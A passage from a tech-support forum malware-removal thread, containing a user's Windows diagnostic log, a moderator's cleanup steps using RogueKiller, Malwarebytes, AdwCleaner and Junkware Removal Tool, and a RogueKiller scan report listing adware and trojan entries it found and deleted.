    FirewallRules: [{633FDB78-A966-45DA-94AF-8E7E07A00E52}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
    FirewallRules: [{B7DF2D4A-249C-4EE4-89BB-1E011DA75A62}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
    FirewallRules: [{4A3B0CB3-A9F4-45DB-9CF0-9E288759D153}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
    FirewallRules: [{037CACFD-45F4-4DEF-A4D3-78D3A94AD23D}] => (Allow) C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe
    FirewallRules: [{98DA30AA-9CE5-4AD2-9F80-1C6FEBEC6E48}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
    FirewallRules: [{1C0FC520-E3B9-41D0-8E66-F63F89BE6292}] => (Allow) C:\WINDOWS\system32\rundll32.exe
    FirewallRules: [{457C41B8-717F-4BD8-B4C2-5EDE2E665A64}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe
    FirewallRules: [{9F6100EB-1481-4E36-A4CA-186F76D0AAD6}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe
    FirewallRules: [{AB0B0862-EEE3-44D7-8D76-F5389278FF4E}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\mininews.exe
    FirewallRules: [{D3272B68-A58B-4BE4-BFB4-A1E81F7012E4}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\mininews.exe
    FirewallRules: [{5D065EAD-6D1C-4570-AC79-6ABE9ACA89FB}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe
    FirewallRules: [{3DD5DD0D-AB20-499F-B80E-A45E37A4E06E}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe

    ==================== Restore Points =========================

    ATTENTION: System Restore is disabled

    ==================== Faulty Device Manager Devices =============

    Name: bsdpr64 service
    Description: bsdpr64 service
    Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    Manufacturer:
    Service: bsdpr64
    Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
    Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
    Devices stay in this state if they have been prepared for removal.
    After you remove the device, this error disappears.Remove the device, and this error should be resolved.

    Name: ComputerZLock
    Description: ComputerZLock
    Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    Manufacturer:
    Service: ComputerZLock
    Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
    Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
    Devices stay in this state if they have been prepared for removal.
    After you remove the device, this error disappears.Remove the device, and this error should be resolved.


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (09/18/2016 11:29:30 AM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

    Error: (09/18/2016 11:28:11 AM) (Source: SideBySide) (EventID: 33) (User: )
    Description: Activation context generation failed for "C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe".
    Dependent Assembly 51.0.2683.0,language="&#x2a;",type="win32",version="51.0.2683.0" could not be found.
    Please use sxstrace.exe for detailed diagnosis.

    Error: (09/18/2016 11:26:54 AM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

    Error: (09/18/2016 11:25:38 AM) (Source: SideBySide) (EventID: 33) (User: )
    Description: Activation context generation failed for "C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe".
    Dependent Assembly 51.0.2683.0,language="&#x2a;",type="win32",version="51.0.2683.0" could not be found.
    Please use sxstrace.exe for detailed diagnosis.

    Error: (09/18/2016 11:22:44 AM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

    Error: (09/18/2016 11:21:20 AM) (Source: SideBySide) (EventID: 33) (User: )
    Description: Activation context generation failed for "C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe".
    Dependent Assembly 51.0.2683.0,language="&#x2a;",type="win32",version="51.0.2683.0" could not be found.
    Please use sxstrace.exe for detailed diagnosis.

    Error: (09/18/2016 11:18:53 AM) (Source: SideBySide) (EventID: 33) (User: )
    Description: Activation context generation failed for "C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe".
    Dependent Assembly 51.0.2683.0,language="&#x2a;",type="win32",version="51.0.2683.0" could not be found.
    Please use sxstrace.exe for detailed diagnosis.

    Error: (09/18/2016 11:12:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

    Error: (09/18/2016 11:10:40 AM) (Source: SideBySide) (EventID: 33) (User: )
    Description: Activation context generation failed for "C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe".
    Dependent Assembly 51.0.2683.0,language="&#x2a;",type="win32",version="51.0.2683.0" could not be found.
    Please use sxstrace.exe for detailed diagnosis.

    Error: (09/18/2016 11:08:59 AM) (Source: SideBySide) (EventID: 35) (User: )
    Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
    Component identity found in manifest does not match the identity of the component requested.
    Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
    Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
    Please use sxstrace.exe for detailed diagnosis.


    System errors:
    =============
    Error: (09/18/2016 11:29:22 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
    Description: The following boot-start or system-start driver(s) failed to load:
    bsdpf64
    bsdpr64

    Error: (09/18/2016 11:29:22 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
    Description: The CloudPrinter service hung on starting.

    Error: (09/18/2016 11:29:22 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
    Description: The Background Logic Handler service hung on starting.

    Error: (09/18/2016 11:28:01 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Search Protect Service service failed to start due to the following error:
    The system cannot find the file specified.

    Error: (09/18/2016 11:27:57 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The ByteFence Security Real-time Protection service failed to start due to the following error:
    The system cannot find the file specified.

    Error: (09/18/2016 11:27:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
    Description: The Kuaizip Update Checker service terminated with the following error:
    The specified module could not be found.

    Error: (09/18/2016 11:27:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
    Description: The Hardware Protection Service service terminated with the following error:
    The specified module could not be found.

    Error: (09/18/2016 11:27:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The FastCompress service failed to start due to the following error:
    The system cannot find the file specified.

    Error: (09/18/2016 11:27:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The ComputerZLock service failed to start due to the following error:
    The system cannot find the path specified.

    Error: (09/18/2016 11:26:50 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
    Description: The following boot-start or system-start driver(s) failed to load:
    bsdpf64
    bsdpr64


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz
    Percentage of memory in use: 44%
    Total physical RAM: 3994.27 MB
    Available physical RAM: 2201.48 MB
    Total Virtual: 7986.71 MB
    Available Virtual: 6072.44 MB

    ==================== Drives ================================

    Drive c: (OSDisk) (Fixed) (Total:298.09 GB) (Free:230.93 GB) NTFS ==>[drive with boot components (obtained from BCD)]

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 6CEA704A)
    Partition 1: (Active) - (Size=298.1 GB) - (Type=07 NTFS)

    ==================== End of Addition.txt ============================
     
  3. broni

    broni Malware Annihilator Techie7 Moderator Head Security

    Please, observe following rules:
    • Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
    • If you're stuck, or you're not sure about certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer behavior, good, or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

    ================================

    [​IMG] There is a lot of infection.
    You can't skip any lines.
    If the log doesn't fit, split it between more replies.

    [​IMG] Uninstall following unwanted programs:

    SafeFinder
    Setup


    [​IMG] Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2

    • Close all the running programs
    • Double click on downloaded setup.exe file to install the program.
    • Click on Start Scan button.
    • Click on another Start Scan button.
    • Wait until the Status box shows Scan Finished
    • Click on Delete.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.
    [​IMG] Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
    NOTE. If you already have MBAM 2.0 installed scroll down.
    • Double-click mbam-setup-2.0.0.1000.exe and follow the prompts to install the program.
    • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
    • Click Finish.
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.
    If you already have MBAM 2.0 installed:
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.
    How to get logs:
    (Export log to save as txt)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Export'.
    • Click 'Text file (*.txt)'
    • In the Save File dialog box which appears, click on Desktop.
    • In the File name: box type a name for your scan log.
    • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
    • Click Ok
    • Attach that saved log to your next reply.
    (Copy to clipboard for pasting into forum replies or tickets)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Copy to Clipboard'
    • Paste the contents of the clipboard into your reply.
    [​IMG] Please download AdwCleaner by Xplode onto your desktop.
    • Close all open programs and internet browsers.
    • Double click on adwcleaner.exe to run the tool.
    • Click on Scan button.
    • When the scan has finished click on Clean button.
    • Your computer will be rebooted automatically. A text file will open after the restart.
    • Please post the contents of that logfile with your next reply.
    • You can find the logfile at C:\AdwCleaner[S1].txt as well.
    [​IMG] Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.
     
  4. photiost

    photiost Established Techie7 Member

    I have tried to uninstall Safefinder and it won`t let me ... there are actually 2 SafeFinders installed ... I can`t uninstall either one ..

    I will try and uninstall Setup now..
     
  5. photiost

    photiost Established Techie7 Member

    Tried to uninstall Safefinder again and it won`t let me ... also Setup is not listed ..

    Can I continue with Rogue Killer
    ?
     
    Last edited: Sep 19, 2016
  6. photiost

    photiost Established Techie7 Member

    RogueKiller V12.6.2.0 (x64) [Sep 12 2016] (Free) by Adlice Software
    mail : http://www.adlice.com/contact/
    Feedback : http://forum.adlice.com
    Website : http://www.adlice.com/download/roguekiller/
    Blog : http://www.adlice.com

    Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
    Started in : Normal mode
    User : Administrator [Administrator]
    Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
    Mode : Delete -- Date : 09/18/2016 19:22:48 (Duration : 00:27:58)

    ¤¤¤ Processes : 14 ¤¤¤
    [PUP|VT.PUP.Optional.LogicHandler] set.exe(1532) -- C:\ProgramData\Logic Handler\set.exe[-] -> Killed [TermProc]
    [PUP|Proc.Injected|VT.PUP.Optional.Linkury] CloudPrinter.exe(1540) -- C:\ProgramData\CloudPrinter\CloudPrinter.exe[-] -> Killed [TermProc]
    [PUP|VT.HEUR:Trojan.Win32.Generic] abril.exe(2508) -- C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe[-] -> Killed [TermProc]
    [PUP|Proc.Injected|VT.PUP.Optional.Linkury] Ronzap.exe(2212) -- C:\ProgramData\Ronzap\Ronzap.exe[-] -> Killed [TermProc]
    [PUP|VT.Generic.Adware.ConvertAd.FA82E9EB] knskAF7C.tmpfs(2356) -- C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs[-] -> Killed [TermProc]
    [Suspicious.Path|VT.SoftwareBundler:Win32/Pokavampo] qnsaF06.tmp(3080) -- C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp[-] -> Killed [TermThr]
    [Proc.Injected] firefox.exe(4784) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe[7] -> Killed [TermProc]
    [Suspicious.Path|VT.Unknown] misgua.dll(2412) -- C:\Users\Administrator\AppData\Local\misgua.dll[-] -> Found
    [PUP|VT.PUP.Optional.LogicHandler] (SVC) backlh -- C:\ProgramData\Logic Handler\set.exe[-] -> Stopped
    [PUP|VT.PUP.Optional.Linkury] (SVC) CloudPrinter -- C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a[-] -> Stopped
    [PUP|VT.HEUR:Trojan.Win32.Generic] (SVC) ProntSpooler -- "C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe"[-] -> Stopped
    [PUP|VT.PUP.Optional.Linkury] (SVC) Ronzap -- C:\ProgramData\\Ronzap\\Ronzap.exe shuz -f "C:\ProgramData\\Ronzap\\Ronzap.dat" -l -a[-] -> Stopped
    [PUP|VT.Generic.Adware.ConvertAd.FA82E9EB] (SVC) xytekyby -- C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs[-] -> Stopped
    [PUP|VT.SoftwareBundler:Win32/Pokavampo] (SVC) zigipyro -- C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp[-] -> Stopped

    ¤¤¤ Registry : 114 ¤¤¤
    [PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{08ACFB57-8187-47f0-AF93-56360D03634A} -> Not selected
    [Suspicious.Path] (X64) HKEY_CLASSES_ROOT\CLSID\{C98AAA6B-FBAC-4FE5-A815-0D3A4176DA64} (C:\Users\ADMINI~1\AppData\Local\Temp\Tools\x64\Microsoft.BDD.Utility.dll) -> Not selected
    [PUP] (X64) HKEY_CLASSES_ROOT\PCSU.Registry -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\Software\SearchModule -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\Software\Wizzwifihotspot -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\Software\Xtp -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\FastCompress-Zip -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\K9Tools -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\mtRonzap -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SearchModule -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SearchProtect -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SlimWare Utilities Inc -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SlimWare Utilities, Inc. -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SPPDCOM -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Tutorials -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Xtp -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\csastats -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\FastCompress-Zip -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\K9Tools -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\osTip -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\ProductSetup -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SlimWare Utilities Inc -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SNDA -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\System Healer -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Tutorials -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\TutoTag -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Wizzlabs -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\csastats -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\FastCompress-Zip -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\K9Tools -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\osTip -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\ProductSetup -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SlimWare Utilities Inc -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SNDA -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\System Healer -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Tutorials -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\TutoTag -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Wizzlabs -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\AppDataLow\Software\AppTrailers -> Not selected
    [PUP] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\AppDataLow\Software\WikiZ -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\AppDataLow\Software\AppTrailers -> Not selected
    [PUP] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\AppDataLow\Software\WikiZ -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC} -> Not selected
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | EasyHotspot : "C:\Program Files (x86)\EasyHotspot\EasyHotspot.exe" [x] -> Not selected
    [Suspicious.Path|VT.Proxy.BPIN] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Run | misgua : rundll32.exe "C:\Users\Administrator\AppData\Local\misgua.dll",misgua [-] -> Deleted
    [Suspicious.Path|VT.DDoS:Win32/Flusihoc.A] (X64) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Run | Pritc : C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe [-] -> Deleted
    [Suspicious.Path|VT.Proxy.BPIN] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Run | misgua : rundll32.exe "C:\Users\Administrator\AppData\Local\misgua.dll",misgua [-] -> ERROR [2]
    [Suspicious.Path|VT.DDoS:Win32/Flusihoc.A] (X86) HKEY_USERS\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Windows\CurrentVersion\Run | Pritc : C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe [-] -> ERROR [2]
    [PUP|Suspicious.Path|VT.PUP.Optional.LogicHandler] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\backlh (C:\ProgramData\Logic Handler\set.exe) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bsdpf64 (\??\C:\WINDOWS\system32\Drivers\bsdpf64.sys) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bsdpr64 (\??\C:\WINDOWS\system32\Drivers\bsdpr64.sys) -> Not selected
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CloudPrinter (C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CltMngSvc (C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe) -> Not selected
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeskTop_E (C:\ProgramData\desktopfindkey\desktop189.exe) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FastCompress (C:\Program Files (x86)\FastCompress-Zip\Fast_Support.exe) -> Not selected
    [PUP|Suspicious.Path|VT.HEUR:Trojan.Win32.Generic] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ProntSpooler ("C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe") -> Deleted
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Ronzap (C:\ProgramData\\Ronzap\\Ronzap.exe shuz -f "C:\ProgramData\\Ronzap\\Ronzap.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rtop ("C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe") -> Not selected
    [PUP|VT.PUP.Optional.SearchModule] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SMUpd (C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe /service) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SWDUMon (system32\DRIVERS\SWDUMon.sys) -> Not selected
    [PUP|VT.Generic.Adware.ConvertAd.FA82E9EB] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\xytekyby (C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs) -> Deleted
    [PUP|Suspicious.Path|VT.SoftwareBundler:Win32/Pokavampo] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\zigipyro (C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp) -> Deleted
    [PUP|Suspicious.Path|VT.PUP.Optional.LogicHandler] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\backlh (C:\ProgramData\Logic Handler\set.exe) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\bsdpf64 (\??\C:\WINDOWS\system32\Drivers\bsdpf64.sys) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\bsdpr64 (\??\C:\WINDOWS\system32\Drivers\bsdpr64.sys) -> Not selected
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\CloudPrinter (C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\CltMngSvc (C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe) -> Not selected
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\DeskTop_E (C:\ProgramData\desktopfindkey\desktop189.exe) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\FastCompress (C:\Program Files (x86)\FastCompress-Zip\Fast_Support.exe) -> Not selected
    [PUP|Suspicious.Path|VT.HEUR:Trojan.Win32.Generic] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\ProntSpooler ("C:\Users\Administrator\AppData\Local\Apps\2.0\abril.exe") -> Deleted
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Ronzap (C:\ProgramData\\Ronzap\\Ronzap.exe shuz -f "C:\ProgramData\\Ronzap\\Ronzap.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\rtop ("C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe") -> Not selected
    [PUP|VT.PUP.Optional.SearchModule] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SMUpd (C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe /service) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SWDUMon (system32\DRIVERS\SWDUMon.sys) -> Not selected
    [PUP|VT.Generic.Adware.ConvertAd.FA82E9EB] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\xytekyby (C:\Program Files (x86)\4C4C4544-1474199813-5810-8038-B3C04F425431\knskAF7C.tmpfs) -> Deleted
    [PUP|Suspicious.Path|VT.SoftwareBundler:Win32/Pokavampo] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\zigipyro (C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\qnsaF06.tmp) -> Deleted
    [PUP|Suspicious.Path|VT.PUP.Optional.LogicHandler] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\backlh (C:\ProgramData\Logic Handler\set.exe) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\bsdpf64 (\??\C:\WINDOWS\system32\Drivers\bsdpf64.sys) -> Not selected
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\bsdpr64 (\??\C:\WINDOWS\system32\Drivers\bsdpr64.sys) -> Not selected
    [PUP|Suspicious.Path|VT.PUP.Optional.Linkury] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\CloudPrinter (C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\CltMngSvc (C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe) -> Not selected
